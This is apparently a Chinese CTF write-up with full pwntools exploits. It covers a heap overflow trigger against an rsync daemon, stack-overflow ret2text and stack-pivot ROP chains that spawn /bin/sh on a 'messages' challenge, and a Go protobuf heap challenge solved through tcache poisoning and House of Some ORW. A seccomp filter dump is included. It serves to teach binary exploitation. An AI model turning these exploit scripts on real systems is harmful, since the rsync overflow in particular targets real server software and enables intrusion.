    
    # gdb.attach(p, 'b *$rebase(0x22068)')
    
    io.sendlineafter(b'@RSYNCD: 31.0 sha512 sha256 sha1 md5 md4', b'@RSYNCD: 31.0 sha512 sha256 sha1 md5 md4')
    io.sendline(b'ftp')
    io.sendafter(b'@RSYNCD: OK', bytes.fromhex('2d2d736572766572002d2d73656e646572002d766c6f67447470727a652e694c73667843497675002e006674702f6c6962632e736f2e3600001e7878683132382078786833207878683634206d6435206d64342073686131137a737464206c7a34207a6c696278207a6c69620400000700000000130000070200a0')) # 复现正常的协议交换过程等
    # cksum count, block length, cksum length, remainder length
    io.sendafter(b'root', p32(1) + p32(64) * 2 + p32(0))
    io.send(p32(0x07000044) + p32(0xcafebabe) + cyclic(64)) # 0x07000044 为消息头,0xcafebabe 为 sum,cyclic(64) 为 sum2(长度最大 16 字节,溢出 48 字节)
    
    io.recvall()

堆缓冲区溢出效果:

img

img

虽然但是,做 CTF glibc heap Pwn 做得有点恶心了,并不想写 exploit...(懒)

题目链接

messages

程序分为 input_messagesprint_messages 两部分。在输入祝福时字符串被连续顺序地存储在 bss 段,字符串之间由空字符分隔。输出祝福前程序先将字符串集的数据结构由连续紧凑存储转换为字符串数组,字符串值被拷贝到栈上。栈上数组长度有限且每个数组元素字符串空间占用相等(即使实际只有几个字符)。注意虽然正常键盘输入无法输入空字符,但利用 pwntools 等工具可以直接向程序输入空字符,无论程序直接使用系统调用还是使用标准库 IO 函数(本题未涉及,但也常见)。所以我们可以在输入的字符串中间插入空字符(b'\0'),程序输出时没有检查字符串最大个数(只检查了字符串最大长度,因此无法直接溢出),可以构造多个字符串(长度须大于 1),从而使程序在之后的字符串数组转换过程中数组下标溢出,直至栈上返回地址。栈上每个字符串占用 56 字节,一个长度占用 8 字节,长度数组长 20 * 8 字节,所以覆盖完字符串数组后还需构造 3 个字符串以到达返回地址。程序中存在后门函数 getflag 且未开启 PIE 保护所以可以直接 ret2text,程序未开启 canary 保护所以可以直接溢出。注意 print_messages 函数栈上还有用于存储字符串长度的数组(IDA 无法正确识别),需要手动修复字符串数组以及长度数组变量类型(char messages[16][56];size_t lengths[20];)。

Exp:

from pwn import *

context(arch='amd64', os='linux')
io = ...
e = ELF('./messages')

io.sendafter(b'> ', (b'aa\0' * 16)[:-1]) # 填满栈上 `messages` 数组
io.sendafter(b'> ', b'\x01\x01\x00' * 3 + p64(e.sym['getflag'])) # 填满栈上 `lengths` 数组及暂存 `rbp`、覆盖返回地址(`\x01` 可为任意非空字符)
io.sendafter(b'> ', b'\n') # 结束输入

io.interactive()

strncpy 会将目标剩余空间全部清零,所以可以正确写入地址而无需考虑将原本的地址剩余部分清零。实际做题时无需理解并修复 IDA 识别的栈上变量类型,也无需精确计算需要构造的字符串个数。只需构造多个不同的字符串,结合 gdb 调试看返回地址被改成哪个字符串值并将该字符串替换为后门函数地址即可。

messages_flag2

拿 flag1 过程中就不难发现由于字符串数组下标溢出修改了 lengths 数组,程序可以越界输出栈上值。栈上一定存在 libc 地址(例如 main 的返回地址在 __libc_start_main 中),因此可以泄露 libc 基址。本题栈上变量布局比较凑巧,虽然由于字符串输入会被地址空字节截断,因此无法在同一个字符串中连续输入两个地址(x86_64 虚拟地址长度仅 6 字节,用户空间地址中必然包含空字节),无法直接写入 ROP 链。但是由于栈上暂存 rbp 和返回地址恰好位于栈上 messages 中两个字符串的交界处,所以可以同时修改,构造栈迁移。第一轮输入时覆盖返回地址为 main 以构造第二轮输入同时泄露 libc 基址。第二轮输入时利用 leave; ret gadget 将栈迁移到 bss 段,提前在此输入 ROP 链(注意先将输入字符串填充至 8 字节对齐),即可 getshell。

Exp:

from pwn import *

context(arch='amd64', os='linux')
io = ...
e = ELF('./messages')
libc = ELF('./libc.so.6', checksec=None)

io.sendafter(b'> ', (b'aa\0' * 16)[:-1])
io.sendafter(b'> ', b'\x01\x01\x00\x01\x01\x00\xd0\x01\x00' + p64(e.sym['main']))
io.sendafter(b'> ', b'\n')

io.recvuntil('有人说:aa'.encode())
io.recvuntil('有人说:aa'.encode())
io.recvuntil('有人说:aa'.encode())
libc.address = u64(io.recvuntil('有人说:'.encode(), drop=True)[-8:]) - 171584 # __libc_start_main+128
success(f'libc_base: 0x{libc.address:x}')

io.sendafter(b'> ', (b'aa\0' * 16)[:-1])
io.sendafter(b'> ', b'\x01\x01\x00\x01\x01')
io.sendafter(b'> ', cyclic(48) + p32(0x4040f8)[:-1]) # 去除地址中空字节
io.sendafter(b'> ', p64(libc.search(asm('leave;ret')).__next__()))
payload0 = flat([
    0x405000,
    libc.search(asm('pop rdi;ret')).__next__(),
    libc.search(b'/bin/sh\x00').__next__(),
    libc.search(asm('pop rsi;ret')).__next__(),
    0,
    libc.search(asm('pop rdx;pop r12;ret')).__next__(),
])
payload1 = b'\x00' * 15 + p64(libc.sym['execve'])
io.sendafter(b'> ', cyclic(5) + payload0)
io.sendafter(b'> ', payload1)
io.sendafter(b'> ', b'\n')

io.interactive()

注意由于 bss 空间不大,getshell 时不能使用 system 函数,否则执行过程中栈指针到达不可写段触发段错误。改用 execve 系统调用包装函数,传参 "/bin/sh", 0, 0,无需额外栈空间。(栈迁移时一般都如此)

SuperHeap

go 套壳的普通 libc 2.35 heap。go 主函数逻辑在 main_main,可以看到有 seccomp 沙箱,用 seccomp-tools 查看:

 line  CODE  JT   JF      K
=================================
 0000: 0x20 0x00 0x00 0x00000004  A = arch
 0001: 0x15 0x00 0x0d 0xc000003e  if (A != ARCH_X86_64) goto 0015
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
 0004: 0x15 0x00 0x0a 0xffffffff  if (A != 0xffffffff) goto 0015
 0005: 0x15 0x08 0x00 0x00000029  if (A == socket) goto 0014
 0006: 0x15 0x07 0x00 0x0000002a  if (A == connect) goto 0014
 0007: 0x15 0x06 0x00 0x00000031  if (A == bind) goto 0014
 0008: 0x15 0x05 0x00 0x00000032  if (A == listen) goto 0014
 0009: 0x15 0x04 0x00 0x00000038  if (A == clone) goto 0014
 0010: 0x15 0x03 0x00 0x0000003b  if (A == execve) goto 0014
 0011: 0x15 0x02 0x00 0x00000065  if (A == ptrace) goto 0014
 0012: 0x15 0x01 0x00 0x000000a5  if (A == mount) goto 0014
 0013: 0x06 0x00 0x00 0x7fff0000  return ALLOW
 0014: 0x06 0x00 0x00 0x00050001  return ERRNO(1)
 0015: 0x06 0x00 0x00 0x00000000  return KILL

,只允许 x86_64,禁掉了 execvesocket 之类,最好 ORW 吧。

然后来到真正的菜单堆逻辑:

while (1) {
    v15 = main_BPUGMG();
    v16 = qword_41A3D0;
    v21 = *(void (***)(void))runtime_mapaccess2_fast64(
        (unsigned int)&RTYPE_map_int_func, qword_41A3D0, v15);
    if (v16) {
        (*v21)();
    } else {
        v35[0] = &RTYPE_string;
        v35[1] = &aInval;
        v1 = 1;
        v2 = 1;
        fmt_Fprintln((unsigned int)off_2BCBE8, qword_41A3E8, (unsigned int)v35,
                     1, 1, (unsigned int)&aInval);
    }
}

。输入数字,从一个 map 取出对应功能函数并执行。创建 CTFBook 逻辑在 main_WEB5SF,其中会读入字符串并解码然后创建新 CTFBook,解码过程是:

encoding_base32__ptr_Encoding_DecodeString -> github_com_golang_protobuf_proto_Unmarshal -> 各字段 encoding_base64__ptr_Encoding_DecodeString

重点是 protobuf,用到的库是 github.com/golang/protobuf,这个库应该是可以直接识别 go 原生类,反序列化对应的 protobuf 数据,因此之后我们编码的时候可以直接用类定义里的字段名(之前做过 go json 序列化的题,json 里的字段名和类定义里的不同,排了很久的错)。到 IDA 的 Local Types,可以看到这个结构体:

00000000 struct __attribute__((aligned(8))) mypackage_CTFBook // sizeof=0x78
00000000 {
00000000     impl_MessageState state;
00000008     int32 sizeCache;
0000000C     // padding byte
0000000D     // padding byte
0000000E     // padding byte
0000000F     // padding byte
00000010     _slice_uint8 unknownFields;
00000028     string Title;
00000038     string Author;
00000048     string Isbn;
00000058     string PublishDate;
00000068     float64 Price;
00000070     int32 Stock;
00000074     // padding byte
00000075     // padding byte
00000076     // padding byte
00000077     // padding byte
00000078 };

,其中 statesizeCacheunknownFields 应该是 protobuf 库生成的,CTFBook 原本的字段是 TitleAuthorIsbnPublishDatePriceStock。所以可以编写这样的 .proto 文件:

syntax = "proto3";

package mypackage;

message CTFBook {
    string Title = 1;
    string Author = 2;
    string Isbn = 3;
    string PublishDate = 4;
    double Price = 5;
    int32 Stock = 6;
}

protoc 编译成 Python 脚本:

$ protoc ctf_book.proto --python_out=.

然后就可以用 Python 愉快输入了:

from ctf_book_pb2 import CTFBook
from dataclasses import dataclass
@dataclass
class Book:
    Title: bytes
    Author: bytes
    Isbn: bytes
    PublishDate: bytes
    Price: float
    Stock: int

    def to_proto_encoded(self):
        book = CTFBook()
        book.Title = base64.b64encode(self.Title)
        book.Author = base64.b64encode(self.Author)
        book.Isbn = base64.b64encode(self.Isbn)
        book.PublishDate = base64.b64encode(self.PublishDate)
        book.Price = self.Price
        book.Stock = self.Stock
        return base64.b32encode(book.SerializeToString())

之后简单 fuzz 一下发现虽然没有 UAF ,但是 edit 时不会检查长度,可以任意堆溢出。所以可以修改 tcache next,tcache attack 劫持 _IO_list_all,程序正常 exithouse of Some_IO_flush_all 时利用 IO wide_data 任意读写,利用 environ 泄漏栈基址,栈上 ROP)。

完整 exp:

#!/usr/bin/python

from pwn import *
from ctypes import *
from ctf_book_pb2 import CTFBook

itob = lambda x: str(x).encode()

context(arch='amd64', os='linux', terminal=['konsole', '-e'], log_level='debug')
binary = './SuperHeap'

io = process(binary)
e = ELF(binary)
libc = ELF('./libc.so.6', checksec=None)

gdb.attach(io, 'set resolve-heap-via-heuristic force') # goroutine 多线程会干扰 pwndbg 识别 main_arena

from dataclasses import dataclass
@dataclass
class Book:
    Title: bytes
    Author: bytes
    Isbn: bytes
    PublishDate: bytes
    Price: float
    Stock: int

    def to_proto_encoded(self):
        book = CTFBook()
        book.Title = base64.b64encode(self.Title)
        book.Author = base64.b64encode(self.Author)
        book.Isbn = base64.b64encode(self.Isbn)
        book.PublishDate = base64.b64encode(self.PublishDate)
        book.Price = self.Price
        book.Stock = self.Stock
        return base64.b32encode(book.SerializeToString())

# count: 28
def add(index: int, book: Book):
    io.sendlineafter(b'> ', b'1')
    io.sendlineafter(b': ', itob(index))
    io.sendlineafter(b': ', book.to_proto_encoded())

def show(index: int):
    io.sendlineafter(b'> ', b'2')
    io.sendlineafter(b': ', itob(index))

def delete(index: int):
    io.sendlineafter(b'> ', b'3')
    io.sendlineafter(b': ', itob(index))

def edit(index: int, book: Book):
    io.sendlineafter(b'> ', b'4')
    io.sendlineafter(b': ', itob(index))
    io.sendlineafter(b': ', book.to_proto_encoded())

def search(keyword: str):
    io.sendlineafter(b'> ', b'5')
    io.sendlineafter(b': ', keyword.encode())

add(0, Book(cyclic(0x800), b'', b'', b'', 0, 0))
delete(0)
for i in range(5):
    add(i, Book(b'', b'', b'', b'', 0, 0))
show(4)
io.recvuntil(b'Author: ')
libc.address = u64(io.recvuntil(b'\n', drop=True).ljust(8, b'\x00')) - 2207136
print(f'libc_base: 0x{libc.address:x}')
show(3)
io.recvuntil(b'Title: ')
heap_base = (u64(io.recvuntil(b'\n', drop=True).ljust(8, b'\x00')) - 2) << 12
print(f'heap_base: 0x{heap_base:x}')

edit(4, Book(cyclic(40) + p64(0x81) + p64(libc.sym['_IO_list_all'] ^ ((heap_base >> 12) + 2)), b'bbb2', b'ccc3', b'ddd4', 10101, 20202))
add(5, Book(cyclic(0x70), b'2bbb', b'3ccc', b'4ddd', 10101, 20202))
add(6, Book(cyclic(0x70), b'2bbb', b'3ccc', b'4ddd', 10101, 20202))

from SomeofHouse import HouseOfSome

hos = HouseOfSome(libc=libc, controled_addr=heap_base + 0x1000)
payload = hos.hoi_read_file_template(heap_base + 0x1000, 0x400, heap_base + 0x1000, 0)
print(payload)
add(7, Book(payload + b'rrrr', b'', b'', b'', 0, 0))
add(8, Book(p64(heap_base + 13344) + cyclic(0x68), b'2bbb', b'3ccc', b'4ddd', 10101, 20202))

io.sendlineafter(b'> ', b'6')
hos.bomb_orw(io, b'/flag')

io.interactive()

虽然做出来了,但是对于 go 部分的理解还比较混乱。